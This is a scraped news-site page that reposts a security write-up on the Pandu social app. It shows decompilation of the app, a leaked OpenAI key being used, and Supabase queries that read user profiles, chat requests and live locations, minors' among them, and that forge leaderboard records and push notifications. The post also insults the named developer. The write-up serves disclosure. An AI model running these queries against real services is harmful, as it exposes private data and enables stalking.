<img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAcIAAAEYAQMAAAD1c2RPAAAAA1BMVEUAAACnej3aAAAAAXRSTlMAQObYZgAAACVJREFUaN7twQEBAAAAgqD+r26IwAAAAAAAAAAAAAAAAAAAACDoP3AAASZRMyIAAAAASUVORK5CYII=" data-src="https://jacob.gold/images/profile.jpg" alt="Serving a half billion requests per day with Rust and CGI" class="img-fluid lazyload" width="269" height="160"/>
</a>
</div>
<h3 class="title fsize-16"><a href="https://blacknews.news/serving-a-half-billion-requests-per-day-with-rust-and-cgi">Serving a half billion requests per day with Rust and CGI</a></h3>
<p class="small-post-meta"> <a href="https://blacknews.news/profile/admin" class="a-username">admin</a>
<span>Jul 9, 2025</span>
<span><i class="icon-comment"></i> 0</span>
<span class="m-r-0"><i class="icon-eye"></i> 0</span>
</p>
</div>
</div>
</div>
</div>
</div>
</div>
</section>
<section class="section section-comments mt-5">
<div class="row">
<div class="col-12">
<div class="nav nav-tabs" id="navTabsComment" role="tablist">
<button class="nav-link active" data-bs-toggle="tab" data-bs-target="#navComments" type="button" role="tab">Comments</button>
</div>
<div class="tab-content" id="navTabsComment">
<div class="tab-pane fade show active" id="navComments" role="tabpanel" aria-labelledby="nav-home-tab">
<form id="add_comment">
<input type="hidden" name="parent_id" value="0">
<input type="hidden" name="post_id" value="9185">
<div class="form-row">
<div class="row">
<div class="form-group col-md-6">
<label>Name</label>
<input type="text" name="name" class="form-control form-input" maxlength="40" placeholder="Name">
</div>
<div class="form-group col-md-6">
<label>Email</label>
<input type="email" name="email" class="form-control form-input" maxlength="100" placeholder="Email">
</div>
</div>
</div>
<div class="form-group">
<label>Comment</label>
<textarea name="comment" class="form-control form-input form-textarea" maxlength="4999" placeholder="Leave your comment..."></textarea>
</div>
<div class="form-group">
</div>
<button type="submit" class="btn btn-md btn-custom">Post Comment</button>
</form>
<div id="message-comment-result" class="message-comment-result"></div>
<div id="comment-result">
<input type="hidden" value="6" id="post_comment_limit">
<div class="row">
<div class="col-sm-12">
<div class="comments">
<ul class="comment-list">
</ul>
</div>
</div>
</div> </div>
</div>
</div>
</div>
</div>
</section>
</div>
</div>
<div class="col-md-12 col-lg-4">
<div class="col-sidebar sticky-lg-top">
<div class="row">
<div class="col-12">
<div class="sidebar-widget">
<div class="widget-head"><h4 class="title">Popular Posts</h4></div>
<div class="widget-body">
<div class="row">
<div class="col-12">
<div class="tbl-container post-item-small">
<div class="tbl-cell left">
<div class="image">
<a href="https://blacknews.news/trump-says-hes-found-a-buyer-for-tiktok">
<img src="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" data-src="https://techcrunch.com/wp-content/uploads/2024/11/GettyImages-2182948673-tiktok.jpg?resize=1200,800" alt="Trump says he’s found a buyer for TikTok" class="img-fluid lazyload" width="130" height="91"/>
</a>
</div>
</div>
<div class="tbl-cell right">
<h3 class="title"><a href="https://blacknews.news/trump-says-hes-found-a-buyer-for-tiktok">Trump says he’s found a buyer for TikTok</a></h3>
<p class="small-post-meta"> <a href="https://blacknews.news/profile/admin" class="a-username">admin</a>
<span>Jun 30, 2025</span>
<span><i class="icon-comment"></i> 0</span>
<span class="m-r-0"><i class="icon-eye"></i> 13</span>
</p>
</div>
</div> </div>
<div class="col-12">
<div class="tbl-container post-item-small">
<div class="tbl-cell left">
<div class="image">
<a href="https://blacknews.news/cloudflare-launches-a-marketplace-that-lets-websites-charge-ai-bots-for-scraping">
<img src="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" data-src="https://techcrunch.com/wp-content/uploads/2019/12/Matthew-Prince-CloudflareDSC00256.jpg?resize=1200,800" alt="Cloudflare launches a marketplace that lets websites charge AI bots for scraping" class="img-fluid lazyload" width="130" height="91"/>
</a>
</div>
</div>
<div class="tbl-cell right">
<h3 class="title"><a href="https://blacknews.news/cloudflare-launches-a-marketplace-that-lets-websites-charge-ai-bots-for-scraping">Cloudflare launches a marketplace that lets websites ch...</a></h3>
<p class="small-post-meta"> <a href="https://blacknews.news/profile/admin" class="a-username">admin</a>
<span>Jul 1, 2025</span>
<span><i class="icon-comment"></i> 0</span>
<span class="m-r-0"><i class="icon-eye"></i> 5</span>
</p>
</div>
</div> </div>
<div class="col-12">
<div class="tbl-container post-item-small">
<div class="tbl-cell left">
<div class="image">
<a href="https://blacknews.news/monster-train-2-review-engine-ingenuity">
<img src="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" data-src="https://www.gameinformer.com/sites/default/files/styles/thumbnail/public/2025/05/22/fd1a1383/mt2_key_art.jpg" alt="Monster Train 2 Review - Engine Ingenuity" class="img-fluid lazyload" width="130" height="91"/>
</a>
</div>
</div>
<div class="tbl-cell right">
<h3 class="title"><a href="https://blacknews.news/monster-train-2-review-engine-ingenuity">Monster Train 2 Review - Engine Ingenuity</a></h3>
<p class="small-post-meta"> <a href="https://blacknews.news/profile/admin" class="a-username">admin</a>
<span>May 23, 2025</span>
<span><i class="icon-comment"></i> 0</span>
<span class="m-r-0"><i class="icon-eye"></i> 4</span>
</p>
</div>
</div> </div>
<div class="col-12">
<div class="tbl-container post-item-small">
<div class="tbl-cell left">
<div class="image">
<a href="https://blacknews.news/elden-ring-nightreign-review-encapsulating-efficiency">
<img src="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" data-src="https://www.gameinformer.com/sites/default/files/styles/thumbnail/public/2025/05/27/66f8c3c7/Elden%20Ring%20Key%20Art.jpeg" alt="Elden Ring Nightreign Review – Encapsulating Efficiency" class="img-fluid lazyload" width="130" height="91"/>
</a>
</div>
</div>
<div class="tbl-cell right">
<h3 class="title"><a href="https://blacknews.news/elden-ring-nightreign-review-encapsulating-efficiency">Elden Ring Nightreign Review – Encapsulating Efficiency</a></h3>
<p class="small-post-meta"> <a href="https://blacknews.news/profile/admin" class="a-username">admin</a>
<span>May 29, 2025</span>
<span><i class="icon-comment"></i> 0</span>
<span class="m-r-0"><i class="icon-eye"></i> 3</span>
</p>
</div>
</div> </div>
<div class="col-12">
<div class="tbl-container post-item-small">
<div class="tbl-cell left">
<div class="image">
<a href="https://blacknews.news/ondo-finance-acquires-sec-registered-broker-dealer-eyes-tokenized-securities">
<img src="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" data-src="https://images.cointelegraph.com/images/528_aHR0cHM6Ly9zMy5jb2ludGVsZWdyYXBoLmNvbS91cGxvYWRzLzIwMjUtMDcvMDE5N2Q2MWMtZDQ3YS03NjE1LWIxNzEtZmI3ZDJiYmU0YzMy.jpg?#" alt="Ondo Finance acquires SEC-registered broker-dealer, eyes tokenized securities" class="img-fluid lazyload" width="130" height="91"/>
</a>
</div>
</div>
<div class="tbl-cell right">
<h3 class="title"><a href="https://blacknews.news/ondo-finance-acquires-sec-registered-broker-dealer-eyes-tokenized-securities">Ondo Finance acquires SEC-registered broker-dealer, eye...</a></h3>
<p class="small-post-meta"> <a href="https://blacknews.news/profile/admin" class="a-username">admin</a>
<span>Jul 4, 2025</span>
<span><i class="icon-comment"></i> 0</span>
<span class="m-r-0"><i class="icon-eye"></i> 3</span>
</p>
</div>
</div> </div>
</div>
</div>
</div>
<div class="sidebar-widget">
<div class="widget-head"><h4 class="title">Follow Us</h4></div>
<div class="widget-body">
<div class="row gx-3 widget-follow">
</div>
</div>
</div>
<div class="sidebar-widget">
<div class="widget-head"><h4 class="title">Recommended Posts</h4></div>
<div class="widget-body">
<div class="row">
</div>
</div>
</div>
<div class="sidebar-widget">
<div class="widget-head"><h4 class="title">Popular Tags</h4></div>
<div class="widget-body">
<ul class="tag-list">
</ul>
</div>
</div>
</div>
</div>
</div> </div>
</div>
</div>
</section>
<style>
.post-text img {
display: none !important;
}
</style>
<script type="application/ld+json">{"@context":"https://schema.org","@type":"Organization","url":"https://blacknews.news","logo":{"@type":"ImageObject","width":600,"height":60,"url":"https://blacknews.news/assets/img/logo.svg"}}</script><script type="application/ld+json">{"@context":"https://schema.org","@type":"WebSite","url":"https://blacknews.news","potentialAction":{"@type":"SearchAction","target":"https://blacknews.news/search?q={search_term_string}","query-input":"required name=search_term_string"}}</script><script type="application/ld+json">{"@context":"https://schema.org","@type":"NewsArticle","mainEntityOfPage":{"@type":"WebPage","@id":"https://blacknews.news/just-fucking-ship-it-or-on-vibecoding"},"headline":""Just Fucking Ship IT" (Or: On Vibecoding)","name":""Just Fucking Ship IT" (Or: On Vibecoding)","articleBody":"Preface\nI have minimal experience with exploitation or security research- some techniques employed in this write-up are almost certainly suboptimal. This is not a tutorial, do not treat it as such. Sensitive information has been censored as best as possible.\nIntroduction\nEarlier in the year I attended a hackathon organized by my university's IEEE branch. My team and I managed to hack together a pretty decent submission, and for our efforts, we were rewarded with second place. Among the submissions, a one Mentora piqued my interest. Mentora marketed itself as an "AI tutor", seeking to gamify quizzes and provide personalized lesson plans using, you guessed it, large language models.\nInterested, I began to explore the "How we built it" section of the Devpost. React Native, Supabase, and OpenAI integration. Yup! This reeks of vibe coder slop. Unfortunately, Mentora never seemed to see the light of day. Luckily, our hero didn't stop there, and this time he's breaking into the social media market. Enter: Pandu.\nWhat even is Pandu?\nMuch like Mentora, Pandu is a pretty generic take on an existing genre but with more AI slop. Disappointingly, there is yet to be an Android release of Pandu, and given that I don't own any Apple devices, investigating this might be a little rough.\nFirst Steps\nApparently, Apple's IPA format is encrypted, meaning that blindly pulling files from a server and expecting to be able to read them isn't going to work. Luckily, someone has managed to automate this process of decrypting these bundles and has even been so kind as to expose the tooling behind a Telegram bot.\n\nAfter acquiring the decrypted IPA, I simply suffixed the file with .zip and extracted it:\nunzip pandu_ipa_v103.ipa.zip\n\nThe archive yielded a Payload/ folder, with the following structure:\n\nThe main file of interest here is the main.jsbundle, which appears to be a JavaScript bundle compiled with Hermes. After a quick pass with hermes-dec, I was left with a mostly readable blob of pseudocode:\npython hbc_decompiler.py ./Payload/Pandu.app/main.jsbundle pandu_decomp.js\n\n\nInitial Investigation\nI began my search by looking for very low-hanging fruit. Surely an app published on the App Store wouldn't expose an OpenAI key, right?\ngrep "'sk-" pandu_decomp.js\n\nr11 = 'sk-proj-*************************************************';\n\nWHAT? There. Is. No. Way.\ncurl "https://api.openai.com/v1/responses" \\\n -H "Content-Type: application/json" \\\n -H "Authorization: Bearer sk-proj-********" \\\n -s \\\n -d '{\n "model": "gpt-4.1",\n "input": "Write me a haiku about why it is not a great idea to hard-code OpenAI API keys into client-facing applications."\n }' | jq -r '.output[0].content[0].text'\n\nSecrets in plain sight— \nExposed keys invite misuse, \nGuard doors, don’t paint signs.\n\nSo it turns out that all the fancy LLM integration is handled client-side, with the users' device issuing the OpenAI API queries and forwarding the output to the "backend" (if you can even call it that, I'll get to this later).\nNow that we know that LLM queries are handled client-side, it shouldn't be too difficult to pull out the system prompt.\n\nAn LLM prompt isn't exactly "valuable information," and "prompt engineering" is most definitely not a skill- Nonetheless I'm expecting this to be quite funny.\n\n"You are a Gen Z App, You are Pandu,you are helping a user spark conversations with a new user, you are not cringe and you are not too forward, be human-like. You generate 1 short, trendy, and fun conversation starter. It should be under 100 characters and should not be unfinished. It should be tailored to the user's vibe or profile info. Keep it casual or playful and really gen z use slangs and emojis. No Quotation mark"\nI wonder what prompted him to tell the model not to be cringe.\nSupabase\nIf you aren't familiar, Supabase is a Backend-as-a-Service, providing CRUD-accessible endpoints, a database, storage buckets, authentication, and even real-time communication. The upside of something like this is that you don't need to understand the complexities that come with backend development in order to build something that "just works". However, you'll later come to see that this is also a hidden downside, as some people shouldn't be permitted within 10 feet of a backend.\nTaking the place of a standard database, Supabase expects the client to talk directly to the database- now, you might be thinking to yourself: "isn't that a horrible idea?" and to your question, I'll reply "yes." The assumption is that the person in charge of configuring Supabase will correctly dish out permissions such that end-users cannot simply read/write to arbitrary relations, but as you'll soon see, this is not always the case.\nWith the decompiled pseudocode in hand, it was as simple as grepping for a few keywords:\nfunction(...) {\n ...\n r1 = {'storage': null, 'autoRefreshToken': true, 'persistSession': true, 'detectSessionInUrl': false};\n r3 = r3.default;\n r1['storage'] = r3;\n r4['auth'] = r1;\n r3 = 'https://XXXXXXXXXXXX.supabase.co'; // supabaseUrl\n r1 = 'eyJh.XXXXXXXX.XXXXXXXXX'; // supabaseAnonKey\n r1 = r5.bind(r0)(r3, r1, r4); // r1 = createClient(supabaseUrl, supabaseAnonKey, r4);\n r2['supabase'] = r1;\n r1 = r1.auth;\n r1 = r1.admin;\n r2['adminAuthClient'] = r1;\n return r0;\n};\n\nNow that we have the Supabase information, it's time to go hunting for relations that might be useful. After some investigation, it appears that all Supabase queries follow roughly the same pattern in the pseudocode:\nr6 = r4.supabase; // supabase.from('user_wallet')...\nr4 = r6.from;\nr13 = 'user_wallet';\n...\n\nWith this in mind, we can write some cheeky Python that'll help us filter through this checks notes 1.5M LoC blob.\n\nI know that this could be accomplished with a regex, but I'm stubborn and refuse to change\n\nrelations: list[str] = []\n\nwith open("pandu_decomp.js") as file:\n lines = file.readlines()\n\n for line_num, line in enumerate(lines):\n if "supabase" not in line:\n continue\n\n if "from" not in lines[line_num + 1] or "":\n continue\n\n target_line = lines[line_num + 2] or ""\n\n if "'" in target_line:\n target_line_parts = target_line.split("'")\n relation = target_line_parts[1]\n\n if relation not in relations:\n relations.append(relation)\n print(relation)\n\nAnd let's run it!\npython find_relations.py\n\nprofiles\nuser_wallet\nuser_progression\nengagement_scores\nuser_interests\nuser_locations\nuser_wallets\nflaggame\nuser_friendships\nfriend_requests\nblocked_users\nreports\ngame_requests\nguessmoji_game\nrizzme_game\ntic_tac_toe_game\ntruthordare_game\nuser_views\nuser_likes\ngame_ideas\nchat_requests\n\nThese relation names are... interesting to say the least.\nLet's poke around and see what we have access to, a quick select from the profiles relation doesn't seem like a terrible idea ;).\nimport { createClient } from '@supabase/supabase-js';\n\nconst supabaseUrl = 'https://XXXXXXXXXXXX.supabase.co';\nconst supabaseAnonKey = 'eyJh.XXXXXXXX.XXXXXXXXX';\n\nconst supabase = createClient(supabaseUrl, supabaseAnonKey, {});\n\nconst result = await supabase\n .from("profiles")\n .select()\n .limit(1)\n\nconsole.log(result["data"])\n\n[\n {\n "id": "3c0f201b-6dee-4858-85d4-ced865223027",\n "updated_at": "2025-06-24T02:33:22.3+00:00",\n "nickname": null,\n "age": null,\n "birth_date": null,\n "gender": null,\n "user_id": null,\n "bio": null,\n "avatar_url": [ null ],\n "expo_push_token": null,\n "created_at": null,\n "username": null,\n "full_name": null,\n "completed_onboarding": false,\n "hasActiveSubscription": false,\n "engagement_score": 0,\n "online": true,\n "verified": false\n }\n]\n\nWell, this is odd. I'm assuming this is a blank account that was created during testing? Either way, we now have a list of fields which is exactly what I was looking for.\nlet brokenProfiles = await supabase\n .from("profiles")\n .select()\n .is("username", null)\n\nlet nonBrokenProfiles = await supabase\n .from("profiles")\n .select()\n .not("username", "is", null)\n\nlet suckers = await supabase\n .from("profiles")\n .select()\n .eq("hasActiveSubscription", true)\n\nconsole.log("broken profiles:", brokenProfiles["data"].length);\nconsole.log("non-broken profiles:", nonBrokenProfiles["data"].length);\nconsole.log("suckers:", suckers["data"].length);\n\nbroken profiles: 1286\nnon-broken profiles: 9427\nsuckers: 146\n\nWeird. I'm not quite sure what this indicates, but those numbers are certainly interesting.\n\n(Can you believe that nearly 10k people were dumb enough to sign up for this app?)\n\nExpo\nI've gone ahead and had my girlfriend create an account on her iPhone, this way I can explore a little more without having to worry about stepping on anyone's toes.\nlet result = await supabase\n .from("profiles")\n .select()\n .eq("username", "zoe604385")\n\n{\n "id": "67cf4fd4-90b0-4f90-9103-1e53dca44787",\n "updated_at": "2025-07-07T02:05:50.224+00:00",\n "nickname": "zoe",\n "age": 25,\n "birth_date": "2000-01-01",\n "gender": "other",\n "user_id": null,\n "bio": "i am passionate about gooning",\n "avatar_url": [ "1751232382134_0.jpg" ],\n "expo_push_token": "ExponentPushToken[**********]",\n "created_at": "2025-06-29T21:24:34.481+00:00",\n "username": "zoe604385",\n "full_name": null,\n "completed_onboarding": true,\n "hasActiveSubscription": false,\n "engagement_score": 2.8,\n "online": false,\n "verified": false\n}\n\nThere are a few things here that are noteworthy, but let's investigate the expo_push_token field. It appears that any time a notification is to be sent out, it is issued by the client, with the following steps being taken:\n\nClient queries profiles relation for recipients' Expo push token\nClient issues POST request to Expo containing the notification content and the recipient's token\nRecipient queries Expo for pending notifications\nRecipient displays notification\n\n\n\nDecompiled Pseudocode for Sending Notifications\n\nr10 = r6;\nr8 = global;\nr6 = r8.HermesInternal;\nr9 = r6.concat;\nr7 = '';\nr6 = ' won the Flag Game! 🏆🏳️';\nr12 = r9.bind(r7)(r10, r6);\nr9 = r8.fetch;\nr7 = {};\nr6 = 'POST';\nr7['method'] = r6;\nr6 = {};\nr10 = 'application/json';\nr6['Content-Type'] = r10;\nr7['headers'] = r6;\nr11 = r8.JSON;\nr10 = r11.stringify;\nr6 = {'to': null, 'title': 'Game Over 💔', 'body': null, 'data': null, 'sound': 'default', 'priority': 'high', 'channelId': 'default'};\nr15 = r15.expo_push_token;\nr6['to'] = r15;\nr6['body'] = r12;\nr12 = {'type': 'game_win', 'gameId': null, 'screen': 'FlagGame'};\nr14 = _closure2_slot3;\nr12['gameId'] = r14;\nr12['winner'] = r13;\nr6['data'] = r12;\nr6 = r10.bind(r11)(r6);\nr7['body'] = r6;\nr6 = 'https://exp.host/--/api/v2/push/send';\nr6 = r9.bind(r1)(r6, r7);\n\n\nUnder no circumstances should these Expo tokens be exposed to clients, however, the very architecture of this application relies on that being the case. With that in mind, I'm quite sure that it's possible to issue arbitrary push notifications to any user. According to the official Expo Docs all we need to do is issue the following POST request:\ncurl -H "Content-Type: application/json" -X POST "https://exp.host/--/api/v2/push/send" -d '{\n "to": "ExponentPushToken[**********]",\n "title":"",\n "body": ""\n}'\n\nI wonder if it worked...\n\nHall of Fame\nThe main feature that sets Pandu apart from other social media platforms is its integration of games. Despite being poorly executed and far from original, there seems to be a group of people competing for spot #1 on the in-game leaderboard. I don't quite like Pandu, but I definitely am competitive by nature- let's see what we can do.\nThe rankings seem to be calculated client-side by simply querying the user_progression relation for the top 20 users sorted by total win count.\nr1 = new Array(2);\nr1[0] = r13;\nr19 = _closure1_slot5;\nr20 = r19.supabase;\nr19 = r20.from;\nr21 = 'user_progression';\nr22 = r19.bind(r20)(r21);\nr20 = r22.select;\nr19 = 'id, username, nickname, wins, level, profiles!inner (avatar_url,age)';\nr24 = r20.bind(r22)(r19);\nr22 = r24.order;\nr19 = {};\nr19['ascending'] = r3;\nr20 = 'wins';\nr24 = r22.bind(r24)(r20, r19);\nr22 = r24.limit;\nr19 = 20;\nr19 = r22.bind(r24)(r19);\nr1[1] = r19;\nr1 = r7.bind(r18)(r1);\nSaveGenerator(address=309);\n\n\n\nCleaned-up Rankings Query\n\nlet leaderboard = await supabase\n .from("user_progression")\n .select("id, username, nickname, wins, level, profiles!inner (avatar_url,age)")\n .order("wins", { ascending: false })\n .limit(20);\n\n\nPresumably, all we should have to do is create a profile and propagate those aforementioned fields such that we satisfy the query. Additionally, we need to set the user_id field to satisfy the foreign key relationship between user_progression and profiles.\nFirst, let's create the account:\nconst auth = await supabase.auth.signUp(\n { \n email: "john@fortnite.com",\n password: "fuckyounerd", \n }\n);\n\nconst userId = auth.data.user.id;\n\nAnd now we can propagate the fields of the relations:\nawait supabase\n .from("user_progression")\n .upsert(\n {\n id: userId,\n user_id: userId,\n username: "john_fortnite_xx",\n nickname: "john xx fortnite",\n wins: 6969,\n level: 1000000,\n }\n );\n\nawait supabase\n .from("profiles")\n .upsert(\n {\n id: userId,\n user_id: userId,\n age: 100,\n avatar_url: ["totallyrealimage.png"]\n }\n );\n\nAnd voilà! :)\n\nChats\nMoving on to something a bit more serious, the privacy implications of using software built by someone whose productive output is directly tied to the uptime of Cursor is absolutely horrendous. Despite his apparent lack of competence, it appears that he has (miraculously) managed to implement user chat sessions in a pretty solid way. By piggybacking off of Supabase's authentication and StreamChat's real-time communication API, he has completely avoided doing any heavy lifting himself. Smart.\nWith this in mind, we should look for the tiny portion of this stack that he is responsible for creating. Before a chat session is initialized, a "chat request" is first sent out to a user, after which they can choose to either accept or reject the invitation. Checking the table of relations we mined earlier, the chat_requests relation seems like it might be relevant. Let's investigate.\nawait supabase\n .from("chat_requests")\n .select()\n .limit(1);\n\n[\n {\n "id": "4a9793fd-2a12-4142-baa1-9552cf5df39c",\n "created_at": "2025-04-17T01:02:26.087669+00:00",\n "sender_id": "0f982e76-6479-4f7d-a995-b26a6d5ee5b6",\n "sender_name": "Christian",\n "sender_avatar": "1744702431504.jpg",\n "receiver_id": "42a26d91-8ea3-492c-9038-ac1b79633e53",\n "receiver_name": "Christopher",\n "receiver_avatar": "1",\n "message": "Yo wassup",\n "status": "accepted"\n }\n]\n\nYup! Our suspicion is confirmed. Every single chat request is public! This is truly a nightmare. Even worse, I seemingly have read/write access to this table, meaning it's feasible to send chat requests with arbitrary messages on behalf of other users.\nUser Location\nOkay, I think it's time we stop beating around the bush. I'm sure if you've been an attentive reader you will have noticed the user_locations relation from earlier. The in-app use case of this appears to be matching users up with others who are geographically close to them. While I understand the justification for a feature like this, the execution here is dangerously flawed. With a single select I am able to pull the live geographic location of any user on the app. You heard me right. This is not the future of social media, it's a sexual predator's wet dream.\nawait supabase\n .from("user_locations")\n .select()\n .eq("id", "0f982e76-6479-4f7d-a995-b26a6d5ee5b6")\n\n[\n {\n "created_at": "2025-03-17T16:15:45.062944+00:00",\n "latitude": 42.6897712735434,\n "longitude": -73.8244290461434,\n "country": "United States",\n "state": "NY",\n "last_updated": "2025-04-15T07:30:23.973+00:00",\n "city": "Albany",\n "id": "0f982e76-6479-4f7d-a995-b26a6d5ee5b6",\n "user_id": "0f982e76-6479-4f7d-a995-b26a6d5ee5b6"\n }\n] \n\nIf you need even more compelling evidence that this app is downright dangerous, take a quick look at this histogram of profile count by age:\n\nNearly a thousand children under the age of 18 with their live location, photo, and age being beamed up to a database that's left wide open. Criminal.\nEnter Christian\n\nChristian is the "mastermind" behind this technological shitshow and its parent company, Lunexis. As you've already seen, this man needs no introduction.\n\nAt first, I was wondering how he managed to even publish something like this, but I'm starting to think that Apple just got tired of rejecting it over and over.\nTakeaway\n"Vibe coding" isn't just a cheap shortcut, it's reckless and dangerous. Christian's incompetence is jeopardizing the privacy of hundreds of people, all while he lines his pockets. What he is doing is illegal, perverse, and downright disgusting.\nThink I'm exaggerating? I was planning on doing some math to estimate his MRR, but it looks like he's already gone ahead and bragged about it on Twitter.\n\nEarlier in this write-up I managed to identify 146 active subscribers, assuming this figure is accurate and his revenue-per-subscription has stayed constant, that leaves us with an estimated MRR just north of $2,500. He is making serious money and has absolutely no clue what he's doing!\nCall to Action\nCalling this platform harmful is not an understatement. I am urging you to stop supporting this creator, report the app immediately, and get friends and loved ones off of this app as swiftly as possible.\n","articleSection":"world","datePublished":"2025-07-09T18:15:11+0000","dateModified":"2025-07-09T18:15:11+0000","inLanguage":"en-US","author":{"@type":"Person","name":"admin","url":"https://blacknews.news/profile/admin"},"publisher":{"@type":"Organization","name":"blacknews.news","logo":{"@type":"ImageObject","width":600,"height":60,"url":"https://blacknews.news/assets/img/logo.svg"}},"image":{"@type":"ImageObject","url":"https://coal.sh/assets/pandu_ipa_dump.png","contentUrl":"https://coal.sh/assets/pandu_ipa_dump.png","width":870,"height":580},"isAccessibleForFree":true,"hasPart":{"@type":"WebPageElement","isAccessibleForFree":true,"cssSelector":[".post-content"]},"speakable":{"@type":"SpeakableSpecification","cssSelector":[".post-content"]},"keywords":["Just"," Fucking"," Ship"," IT"," Or:"," Vibecoding"]}</script><footer id="footer">
<div class="footer-inner">
<div class="container-xl">
<div class="row justify-content-between">
<div class="col-sm-12 col-md-6 col-lg-4 footer-widget footer-widget-about">
<div class="footer-logo">
<img src="https://blacknews.news/assets/img/logo-footer.svg" alt="logo" class="logo" width="178" height="56">
</div>
<div class="footer-about">
blacknews.news </div>
<div class="footer-social-links">
<ul>
<li><a class="rss" href="https://blacknews.news/rss-feeds" aria-label="rss"><i class="icon-rss"></i></a></li>
</ul>
</div>
</div>
<div class="col-sm-12 col-md-6 col-lg-4 footer-widget">
<h4 class="widget-title">Trending Posts</h4>
<div class="footer-posts">
<div class="tbl-container post-item-small">
<div class="tbl-cell left">
<div class="image">
<a href="https://blacknews.news/bitcoin-price-falls-to-107k-despite-1b-spot-btc-etf-inflow-whats-behind-the-move">
<img src="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" data-src="https://images.cointelegraph.com/images/528_aHR0cHM6Ly9zMy5jb2ludGVsZWdyYXBoLmNvbS91cGxvYWRzLzIwMjUtMDcvMDE5N2Q3NzYtZmM4OC03MDc5LWJmYTAtNjY2MzRhZDViOGUx.jpg?#" alt="Bitcoin price falls to $107K despite $1B spot BTC ETF inflow — What’s behind the move?" class="img-fluid lazyload" width="130" height="91"/>
</a>
</div>
</div>
<div class="tbl-cell right">
<h3 class="title"><a href="https://blacknews.news/bitcoin-price-falls-to-107k-despite-1b-spot-btc-etf-inflow-whats-behind-the-move">Bitcoin price falls to $107K despite $1B spot BTC ETF i...</a></h3>
<p class="small-post-meta"> <a href="https://blacknews.news/profile/admin" class="a-username">admin</a>
<span>Jul 5, 2025</span>
<span><i class="icon-comment"></i> 0</span>
<span class="m-r-0"><i class="icon-eye"></i> 1</span>
</p>
</div>
</div> <div class="tbl-container post-item-small">
<div class="tbl-cell left">
<div class="image">
<a href="https://blacknews.news/search-for-survivors-after-houthis-sink-second-red-sea-cargo-ship-in-a-week">
<img src="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" data-src="https://ichef.bbci.co.uk/news/1024/branded_news/524b/live/f1c4ad60-5d0a-11f0-938b-b91000d5e8cf.jpg" alt="Search for survivors after Houthis sink second Red Sea cargo ship in a week" class="img-fluid lazyload" width="130" height="91"/>
</a>
</div>
</div>
<div class="tbl-cell right">
<h3 class="title"><a href="https://blacknews.news/search-for-survivors-after-houthis-sink-second-red-sea-cargo-ship-in-a-week">Search for survivors after Houthis sink second Red Sea ...</a></h3>
<p class="small-post-meta"> <a href="https://blacknews.news/profile/admin" class="a-username">admin</a>
<span>Jul 9, 2025</span>
<span><i class="icon-comment"></i> 0</span>
<span class="m-r-0"><i class="icon-eye"></i> 0</span>
</p>
</div>
</div> <div class="tbl-container post-item-small">
<div class="tbl-cell left">
<div class="image">
<a href="https://blacknews.news/bullying-anorexia-trauma-how-the-post-office-scandal-hurt-children">
<img src="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" data-src="https://ichef.bbci.co.uk/news/1024/branded_news/1617/live/69dfe110-5cf8-11f0-b095-b1be9dc573e9.jpg" alt="Bullying, anorexia, trauma: how the Post Office scandal hurt children" class="img-fluid lazyload" width="130" height="91"/>
</a>
</div>
</div>
<div class="tbl-cell right">
<h3 class="title"><a href="https://blacknews.news/bullying-anorexia-trauma-how-the-post-office-scandal-hurt-children">Bullying, anorexia, trauma: how the Post Office scandal...</a></h3>
<p class="small-post-meta"> <a href="https://blacknews.news/profile/admin" class="a-username">admin</a>
<span>Jul 9, 2025</span>
<span><i class="icon-comment"></i> 0</span>
<span class="m-r-0"><i class="icon-eye"></i> 0</span>
</p>
</div>
</div> </div>
</div>
<div class="col-sm-12 col-md-6 col-lg-4 footer-widget">
<h4 class="widget-title">Newsletter</h4>
<div class="newsletter">
<p class="description">Join our subscribers list to get the latest news, updates and special offers directly in your inbox</p>
<form id="form_newsletter_footer" class="form-newsletter">
<div class="newsletter-inputs">
<input type="email" name="email" class="form-control form-input newsletter-input" maxlength="199" placeholder="Email">
<button type="submit" name="submit" value="form" class="btn btn-custom newsletter-button">Subscribe</button>
</div>
<input type="text" name="url">
</form>
</div>
</div>
</div>
</div>
</div>
<div class="footer-copyright">
<div class="container-xl">
<div class="row align-items-center">
<div class="col-sm-12 col-md-6">
<div class="copyright text-start">
2025 </div>
</div>
<div class="col-sm-12 col-md-6">
<div class="nav-footer text-end">
<ul>
<li><a href="https://blacknews.news/terms-conditions">Terms & Conditions </a></li>
</ul>
</div>
</div>
</div>
</div>
</div>
</footer>
<a href="#" class="scrollup"><i class="icon-arrow-up"></i></a>
<script src="https://blacknews.news/assets/themes/magazine/js/jquery-3.6.1.min.js "></script>
<script src="https://blacknews.news/assets/vendor/bootstrap/js/bootstrap.bundle.min.js "></script>
<script src="https://blacknews.news/assets/themes/magazine/js/plugins-2.4.2.js "></script>
<script src="https://blacknews.news/assets/themes/magazine/js/script-2.4.min.js "></script>
<script>$("form[method='post']").append("<input type='hidden' name='sys_lang_id' value='1'>");</script>
